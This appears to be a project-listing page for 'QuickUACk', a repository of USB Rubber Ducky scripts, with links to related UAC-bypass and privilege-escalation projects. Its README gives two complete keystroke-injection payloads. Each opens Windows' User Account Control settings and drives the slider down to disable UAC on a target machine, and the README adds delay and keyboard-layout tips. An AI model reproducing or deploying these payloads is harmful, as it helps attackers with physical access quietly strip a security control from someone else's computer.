All Projects → JonnyBanana → QuickUACk

JonnyBanana / QuickUACk

Licence: other
🐤 Some of my antiUAC Scripts for Rubbber Ducky 🐤

Projects that are alternatives of or similar to QuickUACk

SneakyEXE
Embedding a "UAC-Bypassing" function into your custom payload
Stars: ✭ 95 (+331.82%)
Mutual labels:  uac, uac-bypass
Privilege Escalation
UAC Bypass for windows
Stars: ✭ 33 (+50%)
Mutual labels:  uac, uac-bypass
dccwUACBypass
PowerShell script to bypass UAC using DCCW
Stars: ✭ 17 (-22.73%)
Mutual labels:  uac, uac-bypass
Uacme
Defeating Windows User Account Control
Stars: ✭ 3,868 (+17481.82%)
Mutual labels:  uac, uac-bypass
UUB
UIAccess UAC Bypass using token duplication and keyboard events
Stars: ✭ 22 (+0%)
Mutual labels:  uac, uac-bypass
Bypass-Uac
Small utility written in c++ to bypass windows UAC prompt
Stars: ✭ 27 (+22.73%)
Mutual labels:  uac, uac-bypass
awesome windows logical bugs
collect for learning cases
Stars: ✭ 447 (+1931.82%)
Mutual labels:  windows-exploitation
Manifesto
Search for information from manifests
Stars: ✭ 33 (+50%)
Mutual labels:  uac-bypass
wsudo
Proof of concept sudo for Windows
Stars: ✭ 71 (+222.73%)
Mutual labels:  uac-bypass
PrintNightmare-LPE
CVE-2021-1675 (PrintNightmare)
Stars: ✭ 71 (+222.73%)
Mutual labels:  windows-exploitation
Raspberry-Pi-Zero-Rubber-Ducky-Duckberry-Pi
A £10 Rubber Ducky USB HID! A USB device which emulates a keyboard and automates key entry.
Stars: ✭ 207 (+840.91%)
Mutual labels:  rubber-ducky
UACWhitelistTool
📃 UAC 白名单小工具!
Stars: ✭ 252 (+1045.45%)
Mutual labels:  uac
ducky
Chrome extension to overlay a (super adorable) rubber duck, as a virtual companion during rubber duck debugging.
Stars: ✭ 80 (+263.64%)
Mutual labels:  rubber-ducky
USB-Rubber-Ducky-App
🐣 Windows GUI for USB Rubber Ducky
Stars: ✭ 63 (+186.36%)
Mutual labels:  rubber-ducky
ToRat client
This is the ToRat client, a part of the ToRat Project.
Stars: ✭ 29 (+31.82%)
Mutual labels:  uac-bypass
slui-file-handler-hijack-privilege-escalation
Slui File Handler Hijack UAC Bypass Local Privilege Escalation
Stars: ✭ 81 (+268.18%)
Mutual labels:  uac-bypass
Awesome Red Teaming
List of Awesome Red Teaming Resources
Stars: ✭ 4,223 (+19095.45%)
Mutual labels:  uac
usb stack
Tiny and portable USB device/host stack for embedded system with USB IP
Stars: ✭ 175 (+695.45%)
Mutual labels:  uac
go-escalate
The goal is to provide an easy to use API to escalate privileges on Linux, Windows and Mac OS
Stars: ✭ 23 (+4.55%)
Mutual labels:  uac-bypass

QuickUACk!

Some of my antiUAC Scripts for Rubbber Ducky.


alt text


A pair of fast solutions to disable UAC (User Account Control)
it works on all windows version 32 and 64 bits with uac (Vista or Earlier)
and are valid for all languages (Latin, of course).

The scripts were created with the Italian keyboard,
so I do not exclude that in some cases they require minor adjustments.
if the target machine is old, I recommend extending the delay time.


Ver 1.0 uses a .exe application from the C: \ Windows \ System32 (system protected) folder,
to start the uac on-screen control and switch to the uac panel.
the C: \ Windows \ SysWOW64 folder for the purpose or other protected system folders that contain exe are also fine.
Several applications contained in System32 are good, but be careful because there are some exceptions.
You can consult this list to see the applications that are whitelisted by default on W7
and therefore do not require uac checking to be performed:

https://books.google.it/books?id=1EXt2U84WZ0C&pg=PA278&lpg=PA278&dq=AdapterTroubleshooter.exe&source=bl&ots=sWxJuFdZdU&sig=OhOUJ9gzJxfLb4jlJPiuZyP2F-U&hl=it&sa=X&ved=0ahUKEwi37qe0_fvaAhWMyqYKHWz8CWQQ6AEIcDAN#v=onepage&q=AdapterTroubleshooter.exe&f=false


alt text


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

QuickUACk Ver. 1.0

DELAY 2000
CTRL ESC
DELAY 200
REM C:\Windows\System32\AdapterTroubleshooter.exe"
REM work on windows version 32 and 64 bit (Vista or Earlier)
REM no reboot is required for disabling
STRING AdapterTroubleshooter
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

QuickUACk Ver. 2.0

DELAY 2000
CTRL ESC
DELAY 200
REM opens directly the User Account Control Panel
REM work on all windows version 32 and 64 bit with uac (Vista or Earlier)
REM no reboot is required for disabling
STRING UAC
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Best VPN

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].